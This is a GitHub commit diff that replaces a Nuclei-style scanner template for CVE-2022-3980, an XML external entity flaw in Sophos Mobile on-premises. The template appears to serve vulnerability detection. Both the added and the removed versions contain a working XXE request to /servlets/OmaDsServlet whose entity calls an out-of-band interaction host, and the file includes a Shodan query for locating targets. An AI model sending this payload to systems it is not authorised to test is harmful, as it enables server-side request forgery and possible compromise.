updated path and matchers

patch-1
Ritik Chaddha 2023-05-09 21:45:10 +05:30 committed by GitHub
parent bda2c2941a
commit b79431ad43
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 48 additions and 42 deletions

View File

@ -0,0 +1,48 @@
id: CVE-2022-3980
info:
name: Sophos Mobile managed on-premises - XML External Entity Injection
author: dabla
severity: critical
description: |
An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
reference:
- https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
- https://nvd.nist.gov/vuln/detail/CVE-2022-3980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-611
cve-id: CVE-2022-3980
metadata:
max-request: 1
verified: "true"
shodan-query: title:"Sophos Mobile"
tags: cve,cve2022,xxe,ssrf
http:
- raw:
- |
@timeout: 50s
POST /servlets/OmaDsServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: "application/xml"
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
<cdl>test</cdl>
redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
condition: or
- type: status
status:
- 400

View File

@ -1,42 +0,0 @@
id: sophos-mobile-xxe_CVE-2022-3980
info:
name: XEE vulnerability in Sophos Mobile managed on-premises
author: dabla
severity: critical
description: Checks exeecution of XXE Payload via dns canary
reference: https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-611
cve-id: CVE-2022-3980
tags: xxe,ssrf
http:
- raw:
- |
POST /servlets/OmaDsServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: "application/xml"
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
<cdl>test</cdl>
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"